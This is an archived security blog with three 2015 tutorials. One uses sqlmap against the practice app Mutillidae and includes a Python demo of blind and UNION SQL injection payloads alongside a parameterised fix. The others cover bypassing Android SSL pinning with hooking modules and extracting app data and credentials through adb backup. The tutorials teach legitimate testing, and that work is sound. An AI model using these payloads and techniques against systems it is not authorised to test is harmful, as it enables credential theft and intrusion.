Monday 30 November 2015

How to use Sqlmap

Sqlmap is an automated SQL injection detection and exploitation tool written in Python. It is an easy-to-use, straightforward tool for exploiting SQL injection in relational databases. Sqlmap supports a variety of DBMSs, including the most popular ones: MySQL, Oracle and MSSQL. The salient features of sqlmap are:
  • Detecting SQL injection
  • Dumping data from databases
  • Running arbitrary SQL statements through its SQL shell feature (--sql-shell)
  • Running arbitrary OS commands through its OS shell feature (--os-shell), where the DBMS and the privileges of its account allow it
Requirements:
Sqlmap is simple to run. Before trying it out, let's look at the most basic and important options needed to use sqlmap.
  • -r <REQUESTFILE>: Load the HTTP request from a file (works for both GET and POST requests)
  • -u <URL>, --url=<URL>: Target URL (e.g. "http://www.site.com/vuln.php?id=1"). For a POST request this must be combined with the --data option.
  • --level=<level>: Level of tests to perform (1-5, default 1). Higher levels test more parameters (cookies at level 2, User-Agent/Referer headers at level 3) and more payloads.
  • --risk=<risk>: Risk of tests to perform (1-3, default 1). Keep it at 1 for detection and raise it only when exploitation needs it: risk 3 adds OR-based payloads that can modify or delete data if the injection point sits inside an UPDATE or DELETE statement.
  • --dump: Dump the entries of the table given with -T <table> in the database given with -D <database>.
  • --dump-all: Dump the entries of every table in every database sqlmap finds.
  • --dbs: Enumerate the databases.
  • --tables: Enumerate the tables of the database given with -D. If -D is omitted, sqlmap enumerates the tables of every database it can find, which takes considerably longer.
For more options, refer to the sqlmap help (use -hh for the full, advanced help):
python sqlmap.py --help



Let's start using sqlmap. For this demo I used Mutillidae, a freely available, intentionally vulnerable web application that can be run locally on Apache for learning purposes. Its source code is publicly available.

The page shown below takes a username and a password as input and shows the user's details if both are correct.


The request to the server hosted on localhost, captured with Burp Proxy, is shown below. The username and password parameters in the query string are both vulnerable to SQL injection. We'll use the username parameter for SQL injection detection and exploitation with sqlmap.


To run sqlmap, open a command prompt or terminal, change to the folder where the sqlmap code was extracted, and run the commands below.

To check whether the username parameter is vulnerable to SQL injection, we need to specify the following:
  • -u: the full URL of the web app page to test
  • -p: the parameter in the query string or request body to test (without -p, sqlmap tests every parameter it finds in the request)
  • --data: if the POST method is used, the request body goes here

Sqlmap has determined that the username parameter is vulnerable to SQL injection and has also fingerprinted the backend database, among other information. Here the backend is MySQL 5.0.12 or later.


Once we have identified that the username parameter is vulnerable, let's additionally specify the DBMS as MySQL with the option "--dbms=MySQL" and tell sqlmap to enumerate all the databases with the option "--dbs". Specifying the DBMS, if you know it, speeds things up because sqlmap skips the payloads meant for other DBMSs.


Sqlmap has successfully enumerated the databases on the DBMS, as shown below.

We'll enumerate the nowasp database, specifying it to sqlmap with the option "-D <database-name>", and tell sqlmap to list the tables in the nowasp database with the option "--tables".


Below screenshot shows the tables from nowasp database.

Looking at the list of tables, the accounts table looks likely to contain sensitive data. We'll dump all the data of that table. To tell sqlmap which table to extract, use "-T <tablename>"; use "--dump" to dump the contents of the specified table (-T) from the specified database (-D).


As you can see, sqlmap has successfully dumped the accounts table, which contains the user credentials. When a dumped column holds recognisable password hashes, sqlmap offers to run a dictionary attack against them before writing the results to its output directory.
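To make clear what sqlmap is doing behind the screenshots above (detecting the injectable username parameter, then dumping the accounts table), here is an added example that is not part of the original post and not sqlmap's own code. It models the page's login lookup twice, once built by string concatenation and once with bound parameters, and runs the two checks sqlmap performs against both. SQLite stands in for Mutillidae's MySQL backend so it runs offline; the table name accounts comes from the post, while the column names and the rows are constructed assumptions.

```python
import sqlite3

# Constructed stand-in for the Mutillidae "accounts" table dumped above. SQLite
# replaces MySQL so the example runs offline; column names and rows are
# assumptions, not Mutillidae's actual schema or data.
SAMPLE_ACCOUNTS = [
    ("admin", "adminpass", "Administrator"),
    ("john", "monkey", "John Doe"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def lookup_vulnerable(conn, username, password):
    """Models the vulnerable page: user input is pasted into the SQL text."""
    query = ("SELECT username, signature FROM accounts "
             "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(query).fetchall()


def lookup_fixed(conn, username, password):
    """Same lookup with bound parameters; the input can never become SQL."""
    query = ("SELECT username, signature FROM accounts "
             "WHERE username = ? AND password = ?")
    return conn.execute(query, (username, password)).fetchall()


def boolean_blind_test(lookup, conn, known_user):
    """The boolean-based blind check sqlmap runs for '-p username'.

    The parameter is sent once with an always-true and once with an
    always-false condition. The trailing comment cuts off the rest of the
    query (here the password check). If the two responses differ, the
    parameter is injectable; a parameterised backend returns the same
    (empty) result for both.
    """
    true_resp = lookup(conn, known_user + "' AND 1=1 -- ", "x")
    false_resp = lookup(conn, known_user + "' AND 1=2 -- ", "x")
    return true_resp != false_resp


def dump_accounts_via_union(lookup, conn):
    """The idea behind '--dump' when a UNION technique is available: a second
    SELECT with the same number of columns pulls the whole table out through
    the page's own result columns."""
    payload = "x' UNION SELECT username, password FROM accounts -- "
    return lookup(conn, payload, "x")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup injectable:", boolean_blind_test(lookup_vulnerable, db, "admin"))
    print("fixed lookup injectable:", boolean_blind_test(lookup_fixed, db, "admin"))
    print("dumped via UNION:", sorted(dump_accounts_via_union(lookup_vulnerable, db)))
```

Against the concatenated query the true and false payloads return different rows and the UNION payload returns every credential; against the parameterised query both payloads are just unknown usernames and nothing comes back, which is exactly the difference sqlmap reports as "injectable" versus "not injectable".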


For POST requests, a more convenient way to run sqlmap is the "-r" option. Save the whole request containing the vulnerable parameter to a file (an example is shown below) and pass the file name. The request can be copied from the Burp Suite history.
The equivalent command for the attack shown above is:
python sqlmap.py -r <request-file-name> -p username
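A request file of the kind -r expects, as an added example (the original's screenshot of the file is not reproduced here). The host, path and cookie value are placeholders; the parameter names are the ones used in this post:

```http
POST /user-info.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
Accept: text/html
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<session-id>
Content-Length: 28

username=admin&password=test
```

The blank line between the headers and the body is required so sqlmap knows where the body starts. Because the file carries no scheme, sqlmap assumes http; add --force-ssl when the target is served over HTTPS.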


Note: This post is for learning purposes only. Do not test systems you are not authorized to test.

Tags: sql injection using sqlmap, sqlmap basic, learn sqlmap.

Sunday 15 November 2015

Bypass SSL Certificate or public key pinning implemented in Android mobile application

Hi folks,

Sometimes during application testing on the Android platform we come across an application that implements SSL (certificate or public key) pinning, which makes it difficult to intercept its traffic with a web proxy during testing.

This post lists tools already available on the internet for bypassing SSL pinning without touching the application code.

Prerequisites before using the tools:

  • The phone must be rooted.
  • The tools used to bypass SSL pinning must be granted superuser access.
  • The CA certificate of the intercepting web proxy must be installed in the phone's certificate store.
Tools for applications running on Android version <= 4.3: Cydia Substrate together with the Android-SSL-TrustKiller module.

Cydia Substrate does not support Android 4.4 (KitKat) and above, so on those versions use the Xposed Framework together with the JustTrustMe module instead.

Download and install the APKs matching your phone's Android version. Once installed, activate the module (Android-SSL-TrustKiller or JustTrustMe) in Cydia Substrate or the Xposed Framework and restart the phone. If everything is configured properly, you can now intercept the application's traffic. Both modules work by hooking the platform and common library classes that validate certificates so that every certificate is accepted; pinning implemented in native code, or in a TLS library the module does not hook, is not covered by them.

Wednesday 11 November 2015

Extract local storage data of mobile application on non rooted Android devices

This post covers how to extract the locally stored data of an application on an Android device that is not rooted. In mobile appsec we have to check for vulnerabilities related to locally stored data. On rooted phones this is quite straightforward: even a file manager can be used to copy the data out.

On non-rooted phones it is not that straightforward: access to /data/data/, where all the installed applications keep their private data, is restricted.

The two ways I know of to extract an application's local data are:
  • Using backup tools
  • Using adb (this method also relies on the application backup mechanism to extract the local data)
I'll show how to extract local application data using adb.

I have installed IGLearner application in my mobile for this demo.



Lets start:

Step 1: Enable USB debugging on the phone and connect it to the laptop/computer.

Step 2: Open a command prompt and change to the folder where adb is present.

Step 3: Before running the actual command, check if your mobile is properly connected by running the command:
adb devices


If your device is listed as above, move to the next step. Otherwise, check your cable and that USB debugging is enabled properly.

Step 4: Run the following command to initiate application backup:
adb backup -f <filename>.ab -noapk <package name>


-noapk instructs adb to back up only the local data, excluding the APK file.
<package name> is the name under which the application's data is stored in /data/data. It can be found in the package attribute of the application's AndroidManifest.xml, as shown below (on a connected device, adb shell pm list packages also lists it). Note that adb backup only includes an application's data if the application has not set android:allowBackup="false" in its manifest; for such an application the backup contains nothing useful.


Note: A prompt to back up the data pops up on the phone, as shown below. Do not enter a password (an encrypted backup cannot be unpacked with the command in Step 6). Tap 'BACK UP MY DATA'.



Step 5: After the command finishes, the file is stored in the same folder as adb. Mine is named data.ab. The backup is not a plain tar file: it starts with a short text header (the magic string ANDROID BACKUP, the format version, a compression flag and the encryption algorithm, which is "none" for an unencrypted backup) followed by the zlib-compressed tar archive. The header has to be stripped and the remainder decompressed.

Step 6: To decode the data, start a Linux box (I have one set up in a VM). Ensure that dd and openssl are installed. Copy the backup file to the Linux box, change to the folder where you copied it, and run:
dd if=<backup_filename_with_extension> bs=24 skip=1 | openssl zlib -d > data.tar
The dd part skips the 24-byte header of an unencrypted backup; openssl zlib -d inflates the rest into a tar archive.


Note: If you get an error while running this command, it is usually one of two things. Either the backup was encrypted because a password was entered in Step 4 (repeat Step 4 without a password and run the command on the new backup file), or your OpenSSL build was compiled without zlib support, in which case openssl zlib is not available and you need another zlib decompressor for the inflate step.

Step 7: The data is now decoded and stored as a tar ball. Extract the tar ball and you have the application's locally stored data.
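As an added example (not from the original post), here is the decode of Steps 5 to 7 done in Python instead of dd and openssl, so it also works where openssl zlib is missing. It parses the backup header rather than skipping a fixed 24 bytes, so a header of a different length is handled, and it refuses an encrypted backup with a clear message instead of producing a corrupt tar. The sample backup it builds for itself is constructed in memory: the package name com.example.iglearner and the file contents are placeholders that only mimic the apps/<package>/db and apps/<package>/sp layout of a real backup.

```python
import io
import tarfile
import zlib

# An Android ".ab" backup starts with four newline-terminated text lines:
#   ANDROID BACKUP      magic
#   <version>           format version
#   <compressed>        1 if the payload is zlib-compressed
#   <encryption>        "none" or "AES-256"
# followed by the (compressed) tar payload. For "1", "1", "none" the header is
# exactly 24 bytes, which is where the 'dd bs=24 skip=1' in Step 6 comes from.
MAGIC = b"ANDROID BACKUP"


def parse_ab_header(data):
    """Return (version, compressed, encryption, payload_offset) for an .ab blob.

    Raises ValueError on a malformed header so a non-backup file is rejected
    instead of being fed to the decompressor.
    """
    lines = []
    offset = 0
    for _ in range(4):
        nl = data.find(b"\n", offset)
        if nl == -1:
            raise ValueError("truncated Android backup header")
        lines.append(data[offset:nl])
        offset = nl + 1
    if lines[0] != MAGIC:
        raise ValueError("not an Android backup file")
    version = int(lines[1])
    compressed = lines[2] == b"1"
    encryption = lines[3].decode("ascii")
    return version, compressed, encryption, offset


def ab_to_tar(data):
    """Strip the header and return the raw tar bytes of an unencrypted backup."""
    version, compressed, encryption, offset = parse_ab_header(data)
    if encryption != "none":
        raise ValueError("backup is %s-encrypted; redo 'adb backup' without a password"
                         % encryption)
    payload = data[offset:]
    return zlib.decompress(payload) if compressed else payload


def list_backup_files(data):
    """Paths of the regular files inside the backup, e.g. apps/<pkg>/db/x.db."""
    with tarfile.open(fileobj=io.BytesIO(ab_to_tar(data)), mode="r:") as tar:
        return [m.name for m in tar.getmembers() if m.isfile()]


def make_sample_backup(package, files, encryption="none"):
    """Constructed .ab blob for offline testing. It mimics the layout adb backup
    uses (apps/<package>/... inside the tar) but is not a real device backup."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name="apps/%s/%s" % (package, name))
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    header = b"ANDROID BACKUP\n1\n1\n" + encryption.encode("ascii") + b"\n"
    return header + zlib.compress(buf.getvalue())


if __name__ == "__main__":
    # Placeholder package name and contents; a real run would read data.ab instead.
    blob = make_sample_backup("com.example.iglearner", {
        "db/users.db": b"SQLite format 3\x00" + b"\x00" * 16,
        "sp/prefs.xml": b"<map><string name='token'>abc</string></map>",
    })
    for path in list_backup_files(blob):
        print(path)
```

To use it on a real backup, read data.ab into a bytes object and write the result of ab_to_tar() to data.tar, then extract that as in Step 7; list_backup_files() shows the database (db/) and shared-preferences (sp/) files worth inspecting first.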



Step 8: I found user credentials stored in one of the databases the application kept locally. This was obtained from the data extracted with the method above.


Hope this assists in your testing. Happy testing.